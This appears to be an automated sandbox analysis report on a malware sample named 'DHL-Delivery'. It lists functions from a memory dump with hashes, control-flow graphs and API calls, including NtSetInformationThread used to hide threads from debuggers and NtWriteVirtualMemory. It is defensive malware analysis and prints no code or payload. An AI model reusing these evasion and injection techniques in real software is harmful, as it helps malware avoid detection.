                        • Opcode ID: de670667a438489caac56c0207ff5a92c69a6fcf1c6f273c9e12f233e996dfa2
                        • Instruction ID: 0476f129d884493d58b319f5a3a2f0dc9d7c98b4a4a8f407e2a76b36c8091c8e
                        • Opcode Fuzzy Hash: de670667a438489caac56c0207ff5a92c69a6fcf1c6f273c9e12f233e996dfa2
                        • Instruction Fuzzy Hash: 7BA1FB3CBC63564EEB11A9788CB13D637979F16720FD940A9DC82CB182D365C44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0712, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6048 21a0712-21a0720 6049 21a0928-21a0940 6048->6049 6050 21a0726-21a07bf call 21a83ac * 2 6048->6050 6049->6049 6051 21a0942-21a0991 call 21a83ac call 21a4d72 6049->6051 6050->6049 6066 21a66a5-21a66ac call 21a07c6 6050->6066 6051->6049 6063 21a0993-21a09cc 6051->6063 6063->6049 6067 21a09d2-21a0a3c call 21a9afd 6063->6067 6074 21a66af-21a66e1 call 21a0536 6066->6074 6075 21a66e2 6066->6075 6067->6049 6076 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 6067->6076 6074->6075 6078 21a6748-21a6760 6075->6078 6079 21a66e4-21a6745 call 21a4ac4 6075->6079 6076->6049 6105 21a0b3c 6076->6105 6082 21a6763-21a67d0 call 21a55cd call 21a4c0a 6078->6082 6079->6082 6106 21a0b3d-21a0bc1 call 21a8844 6105->6106 6111 21a0bc7-21a660e call 21a0c05 6106->6111 6116 21a6679-21a66a3 6111->6116 6117 21a6610-21a6677 call 21a0712 call 21a634e 6111->6117 6116->6066 6117->6075 6117->6116
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: 5feaf40ca66c10ee5e420fb850f7818b33b67c9e6ca58035fa1294f044e9e9ba
                        • Instruction ID: 2da7869e8098189d19b2188bdd6c3a9b98fec5172994814f4a13e159fbb8dcb0
                        • Opcode Fuzzy Hash: 5feaf40ca66c10ee5e420fb850f7818b33b67c9e6ca58035fa1294f044e9e9ba
                        • Instruction Fuzzy Hash: B3A11E7CAC53974EEB119D748CB23DA37939F16750FD940AADC42C7182E7AAC44AC683
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A836D, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 314nativethreadUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6912 21a836d-21a8377 6913 21a0928-21a0940 6912->6913 6914 21a837d-21a83aa 6912->6914 6913->6913 6916 21a0942-21a0991 call 21a83ac call 21a4d72 6913->6916 6916->6913 6922 21a0993-21a09cc 6916->6922 6922->6913 6924 21a09d2-21a0a3c call 21a9afd 6922->6924 6924->6913 6928 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 6924->6928 6928->6913 6939 21a0b3c 6928->6939 6940 21a0b3d-21a0bc1 call 21a8844 6939->6940 6945 21a0bc7-21a660e call 21a0c05 6940->6945 6950 21a6679-21a66ac call 21a07c6 6945->6950 6951 21a6610-21a6677 call 21a0712 call 21a634e 6945->6951 6960 21a66af-21a66e1 call 21a0536 6950->6960 6961 21a66e2 6950->6961 6951->6950 6951->6961 6960->6961 6964 21a6748-21a6760 6961->6964 6965 21a66e4-21a6745 call 21a4ac4 6961->6965 6967 21a6763-21a67d0 call 21a55cd call 21a4c0a 6964->6967 6965->6967
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 2c4976fdf1817095b8a1ec2193cd0a7a9c3038e6d18068578fe16c90a409d7e3
                        • Instruction ID: 4a9a7ec1dca11ef6aba08520bc721d481c884c6884cc00363f6eef1ef1862922
                        • Opcode Fuzzy Hash: 2c4976fdf1817095b8a1ec2193cd0a7a9c3038e6d18068578fe16c90a409d7e3
                        • Instruction Fuzzy Hash: 0F91FC3CBC63A74EEB1199748CB23DA37978F17760FD841A9DC4287182D7AAC44AC583
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A08FC, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312UNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6981 21a08fc-21a08fd 6982 21a08ff 6981->6982 6983 21a0916-21a0926 6981->6983 6984 21a08c1 6982->6984 6985 21a0901 6982->6985 6986 21a0928-21a0940 6983->6986 6984->6981 6986->6986 6987 21a0942-21a0991 call 21a83ac call 21a4d72 6986->6987 6987->6986 6993 21a0993-21a09cc 6987->6993 6993->6986 6995 21a09d2-21a0a3c call 21a9afd 6993->6995 6995->6986 6999 21a0a42-21a0b36 call 21a83ac NtSetInformationThread call 21a5250 call 21a83ac 6995->6999 6999->6986 7010 21a0b3c 6999->7010 7011 21a0b3d-21a0bc1 call 21a8844 7010->7011 7016 21a0bc7-21a660e call 21a0c05 7011->7016 7021 21a6679-21a66ac call 21a07c6 7016->7021 7022 21a6610-21a6677 call 21a0712 call 21a634e 7016->7022 7031 21a66af-21a66e1 call 21a0536 7021->7031 7032 21a66e2 7021->7032 7022->7021 7022->7032 7031->7032 7035 21a6748-21a6760 7032->7035 7036 21a66e4-21a6745 call 21a4ac4 7032->7036 7038 21a6763-21a67d0 call 21a55cd call 21a4c0a 7035->7038 7036->7038
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1.!T$ntdll
                        • API String ID: 0-1346282702
                        • Opcode ID: 2ebb8ed6f1a06eef740cbf60d87e16b048ddb084866d7d4536530eae5b4ebe66
                        • Instruction ID: 2b458f7350f130ab3770dd40b05f2236169a145ba2f1f2b035c223bcdf27229e
                        • Opcode Fuzzy Hash: 2ebb8ed6f1a06eef740cbf60d87e16b048ddb084866d7d4536530eae5b4ebe66
                        • Instruction Fuzzy Hash: 73910E3CAC63A74EEB1199748CB63DA37A79F17710FD840A9DC42C7182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A090D, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 312nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 44464e2a788f813f464d0f03c7bb93e23e2da01cbde8fa44aa47e402ac56c1db
                        • Instruction ID: 4767a7085e6889b6cdb17fe43f874273a3838c97e4894e8ebd88e597377321ea
                        • Opcode Fuzzy Hash: 44464e2a788f813f464d0f03c7bb93e23e2da01cbde8fa44aa47e402ac56c1db
                        • Instruction Fuzzy Hash: 33910D3CBC63A74EEB1299748CB23D937A79F17710F9840A9DC42C7182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0904, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 307nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 49ae5f5c72d97e18eba281f052780e0afdc4a8004c4d83c97cf9b822881ee85b
                        • Instruction ID: f48d97caba53b25e580b349e5e667bc6c6ac1c2d97c6e754430e6810074774fc
                        • Opcode Fuzzy Hash: 49ae5f5c72d97e18eba281f052780e0afdc4a8004c4d83c97cf9b822881ee85b
                        • Instruction Fuzzy Hash: EA811C38AC53A74EEB1199748CB23DA37979F17750FD840A9DC4287182D7AAC44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0974, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 285nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: cff1a24e04f539c95b2ef4392e5a0d7916bae071ef86896b9b818f3a27c18e79
                        • Instruction ID: 6b4965cd2ac3f0391c98ead350f2c4201cbdb7c49318d944f9e03e01840c5d3d
                        • Opcode Fuzzy Hash: cff1a24e04f539c95b2ef4392e5a0d7916bae071ef86896b9b818f3a27c18e79
                        • Instruction Fuzzy Hash: 05810D38AC63A71EEB1199748CF63D937978F16710FD840A9DC42CB182D766C44AC593
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A09A6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 8b2c6e65db91209495512550340120e4f3acaabc303b4273ca822f8d1c7a94f9
                        • Instruction ID: 2b877d1a28b2672cfea621eb8b337c2d5610acdca15c058c28cb4d4b2935a739
                        • Opcode Fuzzy Hash: 8b2c6e65db91209495512550340120e4f3acaabc303b4273ca822f8d1c7a94f9
                        • Instruction Fuzzy Hash: A771FD38BCA3A70EEB1199748CB63D937A79F16750F9800A9DD42CB182D766C14AC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A09F9, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 4046476035-1346282702
                        • Opcode ID: 321209d8e1987ef8f414950ee3f27a6c92e5ab4f555a125bcbbb88cbd634770c
                        • Instruction ID: 1312bf806257f1461d82dad56ce70c56a23f8bb93e29b6bc906d8158a4e884c3
                        • Opcode Fuzzy Hash: 321209d8e1987ef8f414950ee3f27a6c92e5ab4f555a125bcbbb88cbd634770c
                        • Instruction Fuzzy Hash: 1E71DB38ACA3A74EDB1199748CB63D937A39F16650F8841ADD842CB182D76AC14BC693
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0A45, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: 1.!T$ntdll
                        • API String ID: 543350213-1346282702
                        • Opcode ID: b3a4556a13ee1dedd385a2cf9d37934a31c4ec21a7ae9f478791367d48ac745d
                        • Instruction ID: 07ea82010914adf59ee787765af29c63b1e2fdf1ce2561f1366e91aeb61388dd
                        • Opcode Fuzzy Hash: b3a4556a13ee1dedd385a2cf9d37934a31c4ec21a7ae9f478791367d48ac745d
                        • Instruction Fuzzy Hash: 1661CD39BCA3A74EDB11D9748CB63D937A3DF06640F8840ADD942C7182D76AC14BC6A7
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A0A8A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID: ntdll
                        • API String ID: 543350213-3337577438
                        • Opcode ID: e278fc301567b8e02612b343ba31cfa38472f6305fbe3de2f4d1a54dc44378d9
                        • Instruction ID: 21f9503ea5bc33d946c65a895f6514d6f5be1bf45376431e6448811051a8c9e8
                        • Opcode Fuzzy Hash: e278fc301567b8e02612b343ba31cfa38472f6305fbe3de2f4d1a54dc44378d9
                        • Instruction Fuzzy Hash: 2861CD7D7CA3A74EDB01D9748CA63D837A3DF02650F9841ADD942C7182D76AC14BC2A7
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A47A7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99nativeUNIQUE
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID: "_P
                        • API String ID: 3527976591-1889545488
                        • Opcode ID: 0a0d49c63f2aa8c4b2e626a8dd1256e7b71b384983e801cadb5c2d323f5845b1
                        • Instruction ID: 41d2013635845a2f1b0a7272a09071a016640cc9066a045c25dc1a764f4a5989
                        • Opcode Fuzzy Hash: 0a0d49c63f2aa8c4b2e626a8dd1256e7b71b384983e801cadb5c2d323f5845b1
                        • Instruction Fuzzy Hash: 313134787C1346AEEF255E28DCE1BE832A7BF14740FD94128ED9597050D7BA80D5C782
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A4025, Relevance: 1.9, APIs: 1, Instructions: 441nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: a3d3876829b820080b8697d8fab659583d5e8cea91df989ec0a16f3b996278be
                        • Instruction ID: 9a13040807646bf7250b58e49b2565ff800fd7796d988434477df9320b640303
                        • Opcode Fuzzy Hash: a3d3876829b820080b8697d8fab659583d5e8cea91df989ec0a16f3b996278be
                        • Instruction Fuzzy Hash: 85D135787C030AAEFF242D288DB17E522A7AF51790F954129EDD6971C4C7FA84CAC742
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A406C, Relevance: 1.9, APIs: 1, Instructions: 427COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca01b4860a615a9fda74cf2aeaa3427530b1fd4ddc0c8c2fd75b7a6f4c724dfb
                        • Instruction ID: b97203a197221ae87ecc75b0340de8818ec1e28aa90d5e6b32e9a8d9a3f0fb13
                        • Opcode Fuzzy Hash: ca01b4860a615a9fda74cf2aeaa3427530b1fd4ddc0c8c2fd75b7a6f4c724dfb
                        • Instruction Fuzzy Hash: 29D146787C030AAEFF242D288CB17E522A7AF51790FD54129EDD6971C4C7BA84C9C702
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A40A6, Relevance: 1.9, APIs: 1, Instructions: 413nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: d2967a7fd27627b70df2ee289a94363e0e37a0740d5d4ce7eabc8918b94240e9
                        • Instruction ID: 529fa418e635edb2956b54e1fad4aad69bafca3632ebc8374fc6c1c54e83891d
                        • Opcode Fuzzy Hash: d2967a7fd27627b70df2ee289a94363e0e37a0740d5d4ce7eabc8918b94240e9
                        • Instruction Fuzzy Hash: BAC144787C030AAEFF242D688CB17F52267AF51790FD54129EDD6971C4C7BA84C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A40E1, Relevance: 1.9, APIs: 1, Instructions: 400nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 0dcfb59c1c8c05ef69d2ff59791924bc2aa5d2c959bb90375105dae9587f66f2
                        • Instruction ID: ece3ed352f1635f5933d79e3726122267733e0bf7489862f2160fda92e05d294
                        • Opcode Fuzzy Hash: 0dcfb59c1c8c05ef69d2ff59791924bc2aa5d2c959bb90375105dae9587f66f2
                        • Instruction Fuzzy Hash: E0C135787C030AAEFF242D688CB17F922A7BF55390FD54129EDD697184C7BA84C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4124, Relevance: 1.9, APIs: 1, Instructions: 389nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 66b46a8e951410fa1c18aaf2f425e2c9b8554a4ae3aef224a857d5c23ecc54be
                        • Instruction ID: 0dd03337ea7407e33c0ce031676ffc0dbef8dce980f750069559594f94a94da0
                        • Opcode Fuzzy Hash: 66b46a8e951410fa1c18aaf2f425e2c9b8554a4ae3aef224a857d5c23ecc54be
                        • Instruction Fuzzy Hash: 3EC135787C030AAEFF242D689CB17F922A7BF15390FD64129EDD697184C7A984C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4160, Relevance: 1.9, APIs: 1, Instructions: 375nativeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: d6b41e2887f6321272755ea11f2b067052b73c9d6ed0f71d5f5e65b8ea876525
                        • Instruction ID: 02faabe776000d51d724137d2aedba468b24392411939e59f5da3a3ce0316bc3
                        • Opcode Fuzzy Hash: d6b41e2887f6321272755ea11f2b067052b73c9d6ed0f71d5f5e65b8ea876525
                        • Instruction Fuzzy Hash: 11B145787C030AAEFF242D689CB17F922A7BF55390F964129EDC697184C7B984C9C742
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4195, Relevance: 1.9, APIs: 1, Instructions: 370librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: a96c107be5d49e3d8a92af5efc2ccf91cfd6157ee25d53b1672000b4a8d79cd0
                        • Instruction ID: 3d2d5d509e74846a09f813d2f91d1e552c2d40b5c94ae2f40ee307e043ee29d5
                        • Opcode Fuzzy Hash: a96c107be5d49e3d8a92af5efc2ccf91cfd6157ee25d53b1672000b4a8d79cd0
                        • Instruction Fuzzy Hash: 4FB123787C030AAEFF252D688CB17E922A7BF15390F964029EDC697184C7B984C9C742
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A41DF, Relevance: 1.9, APIs: 1, Instructions: 351librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryVirtualWrite
                        • String ID:
                        • API String ID: 3569954152-0
                        • Opcode ID: 138158e2318353fe88a259ca10f47f873b023617cd9ca2fbf0cd19a7941d42a2
                        • Instruction ID: a818717f2a50cbad5a3d7c56f87796261a9d7caa5d075f65b3fc5db29e9e8f21
                        • Opcode Fuzzy Hash: 138158e2318353fe88a259ca10f47f873b023617cd9ca2fbf0cd19a7941d42a2
                        • Instruction Fuzzy Hash: 71B122787C030AAEFF252D68CCB17E932A7BF55390F964129ED8697184C7B984C9C642
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A4226, Relevance: 1.8, APIs: 1, Instructions: 339nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 48f1516d895aa14a0da4100804b445624418124b849fc4e61ac745904399c971
                        • Instruction ID: a0718d1cd650df379b4ee776c43f8a7f6fd31d403523ce1ec5e5b906ed4b42cc
                        • Opcode Fuzzy Hash: 48f1516d895aa14a0da4100804b445624418124b849fc4e61ac745904399c971
                        • Instruction Fuzzy Hash: 36B123787C034AAEFF256D68CCB17E93267BF15380F958029ED8697184D7B984C9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4262, Relevance: 1.8, APIs: 1, Instructions: 328nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 3dd924675a7b8a20f459ab9b31f05ced9860da699019a1455ce2e4cb25b3705f
                        • Instruction ID: 5731410b74bade7886ce323d81b928e311bd5d5218180f74576fdbe5999b0c2b
                        • Opcode Fuzzy Hash: 3dd924675a7b8a20f459ab9b31f05ced9860da699019a1455ce2e4cb25b3705f
                        • Instruction Fuzzy Hash: E3A122787C030AAEFF246D688CB17F932A7BF15380F954029ED8697184D7F984D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A42A1, Relevance: 1.8, APIs: 1, Instructions: 315nativeCOMMON
